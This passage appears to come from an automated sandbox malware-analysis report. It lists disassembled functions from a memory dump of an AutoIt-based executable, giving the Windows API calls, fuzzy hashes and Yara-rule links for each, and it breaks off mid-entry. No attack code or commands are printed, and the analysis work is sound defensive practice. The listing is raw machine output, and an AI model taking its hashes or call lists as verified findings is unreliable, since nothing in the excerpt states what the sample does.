Instruction Fuzzy Hash: 9DD0C2336842247BC6003B90AD06AA9BA45EB01BB2F040471FE0C9524085614E2147D0

Uniqueness

Uniqueness Score: -1.00%

Function 001910D0 Relevance: 3.2, APIs: 2, Instructions: 169COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,00000208), ref: 001911DC

Part of subcall function 001908E0: GetFileAttributesW.KERNELBASE(?), ref: 001908EB

CreateDirectoryW.KERNELBASE(?,00000000), ref: 00191235

Memory Dump Source

Source File: 00000003.00000002.798481679.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_CKK.jbxd

Similarity

API ID: AttributesCreateDirectoryFileFolderPath
String ID:
API String ID: 1991693529-0
Opcode ID: bc432da4606b849b23b615438a69dff05f1a50638b5a920a7c8e37ad84b3aaa6
Instruction ID: de72d5ee9aee0eaa154fb2104cd41bf0d68e0d4e767c39b668b03c2cb7efb4d7
Opcode Fuzzy Hash: bc432da4606b849b23b615438a69dff05f1a50638b5a920a7c8e37ad84b3aaa6
Instruction Fuzzy Hash: 61513031A10209A6EF14DFA0D855BEF7379FF58700F004569E60DE7290EB769B84CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A2CB7C Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00A2C74F: GetOEMCP.KERNEL32(00000000), ref: 00A2C77A

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A2CA1D,?,00000000), ref: 00A2CBF0
GetCPInfo.KERNEL32(00000000,00A2CA1D,?,?,?,00A2CA1D,?,00000000), ref: 00A2CC03

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 4519ac906f751b248403578bcece22ce8c1874916cfdbfa2e79a7b24a3cb7a2f
Instruction ID: 8310c22e89e559fcaac2c8b31ec35f92ca1bc539c1491dc4e14453d9067c1cf1
Opcode Fuzzy Hash: 4519ac906f751b248403578bcece22ce8c1874916cfdbfa2e79a7b24a3cb7a2f
Instruction Fuzzy Hash: 95512270A043659FDB249F7DE881ABFBBF5EF41320F14807ED09A8B152D73999428B90

Uniqueness

Uniqueness Score: -1.00%

Function 00A2C9BB Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00A22D74: GetLastError.KERNEL32(?,?,00A25686,00A33CD6,?,00000000,?,00A25B6A,?,?,?,?,?,00A1E6D1,?,00AB8A48), ref: 00A22D78
Part of subcall function 00A22D74: _free.LIBCMT ref: 00A22DAB
Part of subcall function 00A22D74: SetLastError.KERNEL32(00000000,?,?,?,?,00A1E6D1,?,00AB8A48,00000010,009F4F4A,?,?,00000000,00A33CD6), ref: 00A22DEC
Part of subcall function 00A22D74: _abort.LIBCMT ref: 00A22DF2

Part of subcall function 00A2CADA: _abort.LIBCMT ref: 00A2CB0C
Part of subcall function 00A2CADA: _free.LIBCMT ref: 00A2CB40

Part of subcall function 00A2C74F: GetOEMCP.KERNEL32(00000000), ref: 00A2C77A

_free.LIBCMT ref: 00A2CA33
_free.LIBCMT ref: 00A2CA69

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 2d2f7c4545896dd879ab73e23ed79b4343a19c0710e73d515cfdd392e8e901fd
Instruction ID: 4e538ff77e93c3d415eccc5b4956ebaf6bfeb9902dc802e7a322374543217807
Opcode Fuzzy Hash: 2d2f7c4545896dd879ab73e23ed79b4343a19c0710e73d515cfdd392e8e901fd
Instruction Fuzzy Hash: 8631A431904268AFDB10EBACF541B9D77F6EF45370F2101B9E8049B2A2EB325D41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A22FD7 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,009F1129,00000000,00000000,00000000,?,00A2328B,00000006,FlsSetValue,00A92290,FlsSetValue,00000000,00000364,?,00A22E46,00000000), ref: 00A23037
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A23044

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 8ae9cd7405a78729e222434bdc748bd81f300b411a068d82ecb1b9e075e72390
Instruction ID: 129e279da35140d3c8b618d333e1df5e9129acfcd8ae807eaf78ccac6481f64a
Opcode Fuzzy Hash: 8ae9cd7405a78729e222434bdc748bd81f300b411a068d82ecb1b9e075e72390
Instruction Fuzzy Hash: 8B11C433A041309BDF31EF5DFC4095A73A5AB817607164230FD15AB265D735ED0296F1

Uniqueness

Uniqueness Score: -1.00%

Function 009F5745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009F5773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 00A34052

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1d6b436df332e0df3bb356629f6f009fdf3f6de46b3619f2d7262265d44b26e4
Instruction ID: 27ac331adc385886c37a93acc4a8f9612ddf7c83f163442b121507c062ed1979
Opcode Fuzzy Hash: 1d6b436df332e0df3bb356629f6f009fdf3f6de46b3619f2d7262265d44b26e4
Instruction Fuzzy Hash: 67019230245225B6E3715A6ADC4EFA77F98EF067B0F118300BBAC5A1E1C7B45855CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A13414 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 00A13600: try_get_function.LIBVCRUNTIME ref: 00A13615

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A13432
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00A1343D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: d67098164b77f6a61def6403cc400a99d51d79f285bb9dd7ba6ce2aaadf64d69
Instruction ID: ac3e964968564336393dd63d63416231f558f639982a800d1d39e0ed14bcd932
Opcode Fuzzy Hash: d67098164b77f6a61def6403cc400a99d51d79f285bb9dd7ba6ce2aaadf64d69
Instruction Fuzzy Hash: EFD0127F604301F85D15BFF47E039DA17486951BB63A0575AE431DD2D2EF2087C6251A

Uniqueness

Uniqueness Score: -1.00%

Function 009FB710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 009FBB4E

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 63caa96ddebf7641c400eb341e0352763e8e16b239ef2cf774c797ef1f8c454d
Instruction ID: 4cf17352cc885d4ee4e6f316c841c2a15dfc2d6d10ba0918c44038433ac3183b
Opcode Fuzzy Hash: 63caa96ddebf7641c400eb341e0352763e8e16b239ef2cf774c797ef1f8c454d
Instruction Fuzzy Hash: D032BD39A0020DEFDB10CF54C994FBAB7B9EF84344F158059EA15AB291C7B8ED81DB91

Uniqueness

Uniqueness Score: -1.00%

Function 009F4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 009F4E90: LoadLibraryA.KERNEL32(kernel32.dll), ref: 009F4E9C
Part of subcall function 009F4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,009F4EDD,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4EAE
Part of subcall function 009F4E90: FreeLibrary.KERNEL32(00000000,?,?,009F4EDD,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4EC0

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4EFD

Part of subcall function 009F4E59: LoadLibraryA.KERNEL32(kernel32.dll), ref: 009F4E62
Part of subcall function 009F4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,00A33CDE,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4E74
Part of subcall function 009F4E59: FreeLibrary.KERNEL32(00000000,?,?,00A33CDE,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4E87

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: f5811399da387309612dde2e8cf0242892c7e60ad9d472ed2045bce3ebec7309
Instruction ID: d7912a9ff324ee53c9e6a27a9f27c39a8aee9b28fd11dddddd85e702cd63981b
Opcode Fuzzy Hash: f5811399da387309612dde2e8cf0242892c7e60ad9d472ed2045bce3ebec7309
Instruction Fuzzy Hash: B511E332610209ABCF14FB60DD02FBE77A5AF80B10F20882DF646A61C1EE749A459B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A28402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00A28440

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 70be835c8a5096a391320de798b421104f5411e994f9448e4fb4d3f7452570f1
Instruction ID: d051d35d50c764ef271fd5c6c43dff5c716891ad1694be1d4b33863a05f12e32
Opcode Fuzzy Hash: 70be835c8a5096a391320de798b421104f5411e994f9448e4fb4d3f7452570f1
Instruction Fuzzy Hash: 5E11187590410AEFCB05DF58E941D9A7BF5EF48314F154069F808AB312DA31DA21CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 009F9A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,00000000,00000000), ref: 009F9A9C

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: ae6740e4a7bdd3425104b32dd52dd06f9161f6c3d9ace24e6b099e9556c57f29
Instruction ID: c54deccda891e4fa926a7af1d725167c90ddcbddfe7de7246e7dfccd3a47aa33
Opcode Fuzzy Hash: ae6740e4a7bdd3425104b32dd52dd06f9161f6c3d9ace24e6b099e9556c57f29
Instruction Fuzzy Hash: 8E1148312047099FD720CF09D880B76B7F9EF44764F10C82EEAAB8AA51C771E945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A25000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A24C7D: RtlAllocateHeap.NTDLL(00000008,009F1129,00000000,?,00A22E29,00000001,00000364,?,?,?,00A1F2DE,00A23863,00AC1444,?,00A0FDF5,?), ref: 00A24CBE

_free.LIBCMT ref: 00A2506C

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: 0175705f66970ae7ca2ab9ae511b1135b9e756840d157547f88ff948000adc22
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: D60104726046146FE3218F69AC81A5AFBE8FB89370F65053DE18483280EA30A90586A4

Uniqueness

Uniqueness Score: -1.00%

Function 00A1E469 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__alldvrm.LIBCMT ref: 00A1E4BE

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: __alldvrm
String ID:
API String ID: 65215352-0
Opcode ID: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
Instruction ID: 0f359670f91b2f413f661bafe77d69b4a6fb3c23d79593f4f67c719cb6081757
Opcode Fuzzy Hash: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
Instruction Fuzzy Hash: 3C01D471910358BFEB24DFA4DD46BEEB7ECEB01324F10856EE816D7100D6369E8087A4

Uniqueness

Uniqueness Score: -1.00%

Function 00A1E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: d548ecfda8f10b4a063968d203077ced237749dcf8adad0d93a7f6d0e839484e
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 43F02832511A20AAD7317B7DEE05BDA339C9F52330F100B25FC31931D2CB74E88186A5

Uniqueness

Uniqueness Score: -1.00%

Function 00A24C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,009F1129,00000000,?,00A22E29,00000001,00000364,?,?,?,00A1F2DE,00A23863,00AC1444,?,00A0FDF5,?), ref: 00A24CBE

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 37e196b5329c2d78361b54040b2aa10a02186b9d9eab5d692f06f00225a0ba3f
Instruction ID: a0016ce88bfe6b8b70527a7ec8715fe88114be15ca7e456abac75999429c29c2
Opcode Fuzzy Hash: 37e196b5329c2d78361b54040b2aa10a02186b9d9eab5d692f06f00225a0ba3f
Instruction Fuzzy Hash: 79F0E93160773467DB215F6EFD09F9A3799BF497B0B194131B815AA281CA70D80186E0

Uniqueness

Uniqueness Score: -1.00%

Function 00A23820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00AC1444,?,00A0FDF5,?,?,009FA976,00000010,00AC1440,009F13FC,?,009F13C6,?,009F1129), ref: 00A23852

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0c3a88dd2aa7e1a8fbce3915dc2e78e9cde50f38b9ba66ff6c4e5502390ce00d
Instruction ID: 018ef6e4d82f348b822cc20690f5836e55a7dfb93d85076fccf72c2db69011ca
Opcode Fuzzy Hash: 0c3a88dd2aa7e1a8fbce3915dc2e78e9cde50f38b9ba66ff6c4e5502390ce00d
Instruction Fuzzy Hash: 6DE0E53320223466DE212BBFBD04BDA3659AB43BB0F1A0130BD059E581CB29DD0286E0

Uniqueness

Uniqueness Score: -1.00%

Function 009F4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4F6D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: b89bd253f3046b6564722100111c32e43ef8573e53aa31a0dd912bf51072c77b
Instruction ID: e964f58043fb73ab0f410aa94a3d46549a8ac9fb3f59364e7fd282c8300ca57e
Opcode Fuzzy Hash: b89bd253f3046b6564722100111c32e43ef8573e53aa31a0dd912bf51072c77b
Instruction Fuzzy Hash: 1CF03971505756CFDB349F64D494823BBE8AF143293208E7EE2EE82621CB359888DF50

Uniqueness

Uniqueness Score: -1.00%

Function 009F2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE ref: 009F2DC4

Part of subcall function 009F6B57: _wcslen.LIBCMT ref: 009F6B6A

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 6eaf039cf3b82464da9bf07b28b3c7ccdab428ff65ece39108fb5959cc4dd358
Instruction ID: de091085eef5afde707b8b7dc2200971f30bf8fd6c1a7a52f7db5a9f3389103a
Opcode Fuzzy Hash: 6eaf039cf3b82464da9bf07b28b3c7ccdab428ff65ece39108fb5959cc4dd358
Instruction Fuzzy Hash: 5FE0CD72A042245BC710E2989C05FEA77DDDFC8790F040071FD09D7248E970AD808650

Uniqueness

Uniqueness Score: -1.00%

Function 00A62693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00A626B5

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: 88e4567c8134d8116e285fdb36b75b84ca9897ee427807a764f2c3786d8c2ff8
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: 5BE04FB5609B005FDF399B28E9517F677E8DF49300F00086EF69B83252E57268458B4D

Uniqueness

Uniqueness Score: -1.00%

Function 009F2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 009F3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009F3908

Part of subcall function 009FD730: GetInputState.USER32 ref: 009FD807

SetCurrentDirectoryW.KERNEL32(?), ref: 009F2B6B

Part of subcall function 009F30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 009F314E

Memory Dump Source

